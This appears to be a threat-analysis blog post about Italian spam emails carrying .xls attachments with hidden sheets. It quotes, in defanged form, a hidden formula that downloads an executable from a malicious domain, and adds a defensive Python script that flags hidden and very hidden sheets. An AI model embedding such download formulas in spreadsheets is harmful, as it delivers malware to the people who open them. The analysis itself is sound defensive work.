Figure 1. Sample Italian email propagating .xls attachments with hidden sheets
Figure 2. Opened .xls attachment
When the attachment is downloaded and opened, a prompt to “Enable Content” appears. At first glance, the Excel file appears empty. Once content is enabled, the file attempts to connect to a URL and download another file through the formula “=FORMULA(“hxxp://gstat.dondyablo[.]com/fattura.exe”, $BB$54”. Note that the hidden sheet still does not appear even after the content is enabled.
Figure 3. Hidden formula in the .xls file
The hidden sheet can be manually unhidden, as it is only set to hidden and not to “very hidden.” Very hidden sheets are not accessible via the Excel user interface unless another tool is used. Threat actors can use hidden sheets and formulas to download malicious files and connect to suspicious domains, which opens more possibilities for them.
Figure 4. Unhiding the hidden sheet
We recently saw a similar campaign using a malicious Microsoft Excel 4.0 Macro sheet with a suspicious formula that is set to “very hidden.” It was also propagated through spam emails.
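For triage without opening the file in Excel, the "hidden" and "very hidden" states described above can be read directly from the BoundSheet8 records in the workbook globals. The following is an added example, not code from the original article: it assumes the `Workbook` stream has already been extracted from the .xls OLE container (for instance with a library such as olefile), and the sample bytes and sheet names are constructed.

```python
import struct

BOUNDSHEET = 0x0085  # BoundSheet8 record: one per sheet, in the workbook globals
EOF = 0x000A         # ends the workbook globals substream
VISIBILITY = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_TYPE = {0: "worksheet", 1: "Excel 4.0 macro sheet", 2: "chart", 6: "VBA module"}

def list_sheets(stream: bytes):
    """Walk BIFF8 records and return (name, visibility, type) for each sheet."""
    sheets, pos = [], 0
    while pos + 4 <= len(stream):
        rec_type, rec_len = struct.unpack_from("<HH", stream, pos)
        data = stream[pos + 4:pos + 4 + rec_len]
        pos += 4 + rec_len
        if rec_type == EOF or len(data) < rec_len:  # end of globals or truncated
            break
        if rec_type != BOUNDSHEET or rec_len < 8:
            continue
        # Bytes 0-3 are the sheet's stream offset; then state, type, name length, flags.
        state, kind, cch, flags = struct.unpack_from("<BBBB", data, 4)
        if flags & 1:  # fHighByte set: name stored as UTF-16LE
            name = data[8:8 + 2 * cch].decode("utf-16-le", "replace")
        else:          # compressed: one byte per character
            name = data[8:8 + cch].decode("latin-1")
        sheets.append((name, VISIBILITY.get(state & 3, "unknown"),
                       SHEET_TYPE.get(kind, f"type 0x{kind:02x}")))
    return sheets

def flag_concealed(sheets):
    """Sheets a user would not see on the tab bar; worth a closer look in triage."""
    return [s for s in sheets if s[1] != "visible"]

# --- Constructed sample: a minimal globals substream with three sheets ---
def rec(rec_type, payload):
    return struct.pack("<HH", rec_type, len(payload)) + payload

def boundsheet(name, state, kind):
    raw = name.encode("latin-1")
    return rec(BOUNDSHEET, struct.pack("<IBBBB", 0, state, kind, len(raw), 0) + raw)

SAMPLE = (rec(0x0809, b"\x00" * 16)            # BOF (contents not needed here)
          + boundsheet("Sheet1", 0, 0)         # visible worksheet
          + boundsheet("Data", 1, 0)           # hidden worksheet
          + boundsheet("Macro1", 2, 1)         # very hidden Excel 4.0 macro sheet
          + rec(EOF, b""))

if __name__ == "__main__":
    for name, vis, kind in flag_concealed(list_sheets(SAMPLE)):
        print(f"{name}: {vis} ({kind})")
```

A concealed sheet is not malicious by itself, so treat the result as a reason to inspect the sheet's formulas rather than as a verdict.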
Spam email is one of the vehicles cybercriminals use to spread malicious files. Users can defend against these types of threats with the following best practices:
Security solutions can also help safeguard against spam and other email-based threats:
For the list of IoCs, please refer to this document.